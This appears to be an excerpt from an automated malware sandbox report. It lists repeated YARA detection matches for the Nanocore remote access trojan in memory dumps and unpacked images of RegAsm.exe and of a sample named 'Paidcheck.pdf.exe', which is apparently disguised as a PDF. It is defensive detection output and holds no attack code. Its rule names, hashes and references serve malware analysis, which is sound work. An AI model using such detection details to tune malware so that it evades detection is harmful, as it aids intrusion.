      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
